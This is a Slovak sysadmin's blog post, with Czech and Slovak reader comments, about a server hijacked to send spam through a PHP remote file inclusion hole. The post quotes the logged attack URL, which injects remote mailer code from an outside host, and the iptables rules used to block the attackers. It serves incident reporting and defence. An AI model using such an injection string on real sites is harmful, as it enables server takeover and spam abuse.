abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
Přihlášení | Registrace
×
napište » Zprávičky
inzerujte » Pracovní nabídky
    OpenBSD 7.8
    dnes 13:11 | Nová verze

    Bylo vydáno OpenBSD 7.8. S předběžnou podporou Raspberry Pi 5. Opět bez písničky.

    Ladislav Hagara | Komentářů: 0
    Valkey 9.0
    dnes 05:44 | Nová verze

    Valkey (Wikipedie) byl vydán v nové major verzi 9.0. Valkey je fork Redisu.

    Ladislav Hagara | Komentářů: 2
    Kritická zranitelnost v knihovně pro Rust async-tar a jejích forcích
    dnes 05:22 | Bezpečnostní upozornění

    Byly publikovány informace o kritické zranitelnosti v knihovně pro Rust async-tar a jejích forcích tokio-tar, krata-tokio-tar a astral-tokio-tar. Jedná se o zranitelnost CVE-2025-62518 s CVSS 8.1. Nálezci je pojmenovali TARmageddon.

    Ladislav Hagara | Komentářů: 3
    AlmaLinux 10.1 přinese btrfs
    včera 23:15 | Nová verze

    AlmaLinux přinese s verzí 10.1 podporu btrfs. XFS bude stále jako výchozí filesystém, ale instalátor nabídne i btrfs. Více informací naleznete v oficiálním oznámení.

    Max | Komentářů: 2
    ChatGPT Atlas
    včera 22:33 | IT novinky

    Společnost OpenAI představila svůj vlastní webový prohlížeč ChatGPT Atlas. Zatím je k dispozici pouze na macOS.

    Ladislav Hagara | Komentářů: 0
    KDE Plasma 6.5
    včera 14:33 | Nová verze

    Desktopové prostředí KDE Plasma bylo vydáno ve verzi 6.5 (Mastodon). Přehled novinek i s videi a se snímky obrazovek v oficiálním oznámení. Podrobný přehled v seznamu změn.

    Ladislav Hagara | Komentářů: 3
    Orange Pi 6 Plus
    včera 13:55 | IT novinky

    Rodina jednodeskových počítačů Orange Pi se rozrostla (𝕏) o Orange Pi 6 Plus.

    Ladislav Hagara | Komentářů: 7
    Humble Tech Book Bundle: All Things Raspberry Pi by Raspberry Pi Press
    včera 13:33 | IT novinky

    Na Humble Bundle běží akce Humble Tech Book Bundle: All Things Raspberry Pi by Raspberry Pi Press. Se slevou lze koupit elektronické knihy od nakladatelství Raspberry Pi Press a podpořit Raspberry Pi Press, Raspberry Pi Foundation North America nebo Humble.

    Ladislav Hagara | Komentářů: 0
    Tesla přidává režim Mad Max
    včera 11:44 | Humor

    Přidaný režim autonomního řízení vozidel Tesla Mad Max je dostupný pro vybrané zákazníky v programu EAP (Early Access Program). Nový režim je na silnici agresivnější, častěji mění pruhy a ne vždy dodržuje rychlostní limity. Agentura JPP spekuluje, že v Česku by se mohl nový režim namísto Mad Max jmenovat Mad Turek...

    karkar | Komentářů: 24
    DietPi 9.18
    včera 04:00 | Nová verze

    Byla vydána nová verze 9.18 z Debianu vycházející linuxové distribuce DietPi pro (nejenom) jednodeskové počítače. Nově také pro NanoPi R3S, R3S LTS, R76S a M5. Přehled novinek v poznámkách k vydání.

    Ladislav Hagara | Komentářů: 0
    Centrum | Napsat | Starší
    navrhněte » Anketa
    Jaké řešení používáte k vývoji / práci?
     (36%)
     (48%)
     (20%)
     (20%)
     (22%)
     (18%)
     (21%)
     (18%)
     (18%)
    Celkem 255 hlasů
     Komentářů: 14, poslední 14.10. 09:04
    Rozcestník
    AbcLinuxu
    HDmag.cz
    cievo - Ondrej Žilinec / Cievo
    Ondrej Žilinec / Cievo
    Aktuální zápisy
    ?Přístup k archivovaným zápisům za jednotlivé měsíce. Archív

    ?Seznam mých oblíbených stránek, které pravidelně navštěvuji. Oblíbené stránky
    ?Přístup na osobní hlavní stranu a na hlavní stranu všech blogů. Navigace
    Nej blogů na AbcLinuxu
    Nejčtenější za poslední měsíc Nejkomentovanější za poslední měsíc
    AbcLinuxu:/ Blogy / Ondrej Žilinec / Cievo / System admin blog / SPAM nas kazdodenny - ako mozete byt zneuzity
    Štítky: e-mail, firewally, IDE, Internet, iptables, PHP, programování, SSH, web, webmail

    SPAM nas kazdodenny - ako mozete byt zneuzity

    5.9.2007 09:19 | Přečteno: 1217× | System admin blog | poslední úprava: 5.9.2007 09:23

    Dalsia prihoda, ktora zvyraznuje moj odpor ku SPAMu

    Ked sme sli s mojou polovickou domov z prace dostal som SMS v zneni:"Caves, nejaky problem so serverom?nejde ani web ani ftp". Nevedel som o koho ide, kedze sa nepodpisal, tak som mu volal spat. Ukazalo sa, ze je to kamarat X!ch. Prislubil som mu, ze ked sa dostanem domov, tak mu na to pozriem. Predpokladal som, ze ma problem on so sietov. Za 10 minut som dostal druhu SMS od kamarata JOHANIATKA. Napisal:"Ahoj. Vypadok servera ...uz je to viac ako hodinu(Len pre info, ci o tom viete). Majo". Pridali sme do kroku s polovickou. Asi sa nieco deje.

    Dosiel som domov...pingat server islo...aj SSH siel. Ale pozeral som, ze vsetka RAMka bola zozrata Postfixom a Apachom. Vo vronte Postfixu bolo 25 000 sprav, ktore boli poslane od uzivatela www-data na nezname/neexistujuce adresy. Tak reku, ze niekto sa bavi. Hladal som ale nic som nenasiel. Ked som restartol Apacha, prestali chodit dalsie maily do fronty. Tak som bol spokojny sam zo sebou. Vymazal som maily z fronty a bol pokoj.

    Na dalsi ten som robil nieco na pocitaci. Isiel som si cez webmail pozriet svoju postu a na uvitacej stranke Horde som nasiel spravu od servra, ze ma malo miesta na disku. Prihlasim sa ma masinu vidim, ze je plny disk na ktorom su e-maily z fronty Postfixu. Pozriem do fronty a vo fronte 55 000 nedorucenych mailov. Rozhodol som sa hladat co sa uchylak toto robi. Po asi hodine hladania som dosiel na nasledovne veci:


    - Pozrel som si server-status pre Apacheho a nasiel som nasledovnu podozrivu linku: DOMENA/main.php?p=http://www.danfortier.com/en/style.txt?. Kuknem na web a co nevidim? V stranke zakaznika je vlozeny formular zo stranky http://www.danfortier.com/en/style.txt. Ked si pozries tu stranku, je to cisty PHP kod na zasielanie mailov.

    - Pozeral som logy a dosiel som na 4 IP adresy odkial to spustali: 196.1.176.194, 88.101.234.10, 82.206.131.126 a 195.225.62.76. Samozrejme dostali DROP do iptables:
    iptables --list -v -n -t raw
    ...
    46 2804 DROP all -- eth0 * 196.1.176.194 0.0.0.0/0
    0 0 DROP all -- eth0 * 88.101.234.10 0.0.0.0/0
    0 0 DROP all -- eth0 * 82.206.131.126 0.0.0.0/0
    0 0 DROP all -- eth0 * 195.225.62.76 0.0.0.0/0
    ...
    - Poziadal som vyvojara webu (dost znamu firmu) na opravenie diery vo webe, pretoze to moze dospiet az k vypnutiu ich webu.

    Takze mili admini, bacha na derave weby, ktore su mozno aj u vas hostovane. Dostanete sa do black-listov bez svojeho zapricinenia a ani neviete ako a zase budete vy ty najhorsi, pretoze zakaznikovi nejde posielat maily :-).

           

    Hodnocení: 100 %

            špatnédobré        

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Nástroje: Začni sledovat (2) ?Zašle upozornění na váš email při vložení nového komentáře. , Tisk

    Vložit další komentář

    5.9.2007 09:36 thefox | skóre: 25 | Ťapešovo
    Rozbalit Rozbalit vše Re: SPAM nas kazdodenny - ako mozete byt zneuzity
    Toto sa dá systematickejšie zakázať direktívou 
    allow_url_fopen = Off
    a 
    allow_url_include = Off
    v php.ini.

    Všetky aplikácie na hostingu sa celkom dobre auditovať nedajú, a toto zabráni presne takémuto zneužitiu deravej aplikácie. Je síce potom trošku problematickejšie využívanie off-site zdrojov pre programátorov, ale nie je to nič nezvládnuteľné (namiesto jednoduchého include alebo fopen treba použiť knižnicu CURL).
    0118 999 881 999 119 725 3
    5.9.2007 09:41 fixinko | skóre: 15 | Bratislava
    Rozbalit Rozbalit vše Re: SPAM nas kazdodenny - ako mozete byt zneuzity
    alebo opatchovat PHPcko suhosin patchom :)
    5.9.2007 09:46 cievo | blog: Ondrej Žilinec / Cievo | Vrútky
    Rozbalit Rozbalit vše Re: SPAM nas kazdodenny - ako mozete byt zneuzity
    Dakujem. Mno... :) Len neviem, preco som to povoloval...asi nejaky zakaznik vyzadoval :)
    ...Good question is half of the answer...
    5.9.2007 10:12 fixinko | skóre: 15 | Bratislava
    Rozbalit Rozbalit vše Re: SPAM nas kazdodenny - ako mozete byt zneuzity
    mozno si zalamil ;) ale aj to sa stava :-)
    5.9.2007 11:00 thefox | skóre: 25 | Ťapešovo
    Rozbalit Rozbalit vše Re: SPAM nas kazdodenny - ako mozete byt zneuzity
    Ono je to myslím zapnuté defaultne a keď človek nevie, prečo to chce vypnúť, tak ho to nenapadne :-). Tiež som na tom tak bol a tiež som rozoslal nejaký ten spam :-P.
    0118 999 881 999 119 725 3
    5.9.2007 09:55 fakenickname | skóre: 42 | blog: fakeblog
    Rozbalit Rozbalit vše Re: SPAM nas kazdodenny - ako mozete byt zneuzity
    To se mi taky stalo. Mohlo za to include, které se prostě opravilo na file_exists(.. a byl klid.
    5.9.2007 14:00 Petr
    Rozbalit Rozbalit vše Re: SPAM nas kazdodenny - ako mozete byt zneuzity
    Hm ten spam se nějak rozmáhá. Seznamu už kvůli tomu cca 4 dni nefunguje pořádně pošta. To fakt není nějaká možnost jak to automaticky zahazovat než to zahltí server?
    Michal Fecko avatar 5.9.2007 14:08 Michal Fecko | skóre: 31 | blog: Poznámkový blog
    Rozbalit Rozbalit vše Re: SPAM nas kazdodenny - ako mozete byt zneuzity
    To fakt není nějaká možnost jak to automaticky zahazovat než to zahltí server?
    Skusit to zahadzovat pred serverom (nejaky stroj na pred-triedovanie posty) - ale neviem ci sa tym vyriesi "zahltenie"... :-(
    Luk avatar 5.9.2007 14:56 Luk | skóre: 47 | blog: Kacířské myšlenky | Kutná Hora
    Rozbalit Rozbalit vše Re: SPAM nas kazdodenny - ako mozete byt zneuzity
    Server Postfix má nástroj zvaný anvil, který umožňuje přiškrcovat příjem pošty od jednotlivých klientů (na základě četnosti během určitého intervalu, např. 60 s). Tím se dá zahlcení zabránit, aniž by trpěl běžný poštovní provoz.
    Šifrování je absolutní nutnost a pomáhá chránit před nekalými živly

    Založit nové vláknoNahoru

    Píšeme jinde
    ISSN 1214-1267   www.czech-server.cz
    Redakce | Inzerce | Podmínky použití | Osobní údaje
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.